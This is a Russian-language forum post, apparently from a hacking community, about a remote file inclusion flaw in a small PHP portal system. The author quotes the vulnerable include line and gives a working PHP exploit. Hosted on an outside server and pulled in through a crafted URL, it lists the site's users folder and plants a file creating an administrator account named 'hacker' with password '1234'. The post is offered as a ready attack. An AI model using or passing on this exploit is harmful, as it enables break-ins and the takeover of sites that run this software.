с сайта http://www.enuke.net/shad0wed/ (разработчики) можно скачать небольшую портал систему (на подобие phpnuke, но только намного приметивнее, не использует MySQL) мне довелось сталкнуться с одним сайтом, который был сделан с помощью этой горе-системы! =)

весь прикол заключается в том что файл
site.ru/modules/downloads/include.php
содержит
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><?php
require($mod_root."/w_vars.php");
?>[/QUOTE]<span id='postcolor'>

ну че!? намек понят?

а вот какой скрипт я придумал для того чтобы найти папку с пользователями (users), а потом сразу создать пользователя в ней с привелегиями 100 - админ!
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><pre><?php

if (isset($dir)) {
$d = dir($dir);
echo "Handle: " . $d->handle . "<br />\n";
echo "Path: " . realpath($d->path) . "<br />\n";
while (false !== ($entry = $d->read())) {
echo $entry."<br />\n";
}
$d->close();

if (isset($hack)) {

$zz = '<' . '?php
$username = "hacker";
$password = "81dc9bdb52d04dc20036dbd8313ed055";
$email = "hacker@mail.ru";
$website = "";
$occupation = "";
$interests = "";
$avatar = "";
$user_online = "0";
$signature = "";
$info = "";
$rank = 100;
$login_time = -1;
$remote_ip = "";
$messages = "";
if((strtolower($usr) == strtolower($username)) &amp;&amp; ($pwd == $password)) {
$u_rank = $rank;
$online = 1;
}
?' . '>';

$filename = $dir . '/hacker.php';
if (!$handle = fopen($filename, 'w')) exit;
if (fwrite($handle, $zz) === FALSE) exit;
fclose($handle);



}

}

?></pre>[/QUOTE]<span id='postcolor'>этот скрипт надо назвать w_vars.php, запихнуть к примеру на narod.ru
и построить URL
site.ru/modules/downloads/include.php?mod_root=http://xxx.narod.ru&amp;hack=1&amp;dir=../../users/

забыл сказать пароль будет 1234 (там в скриптике фигурирует его MD5 хеш)

GL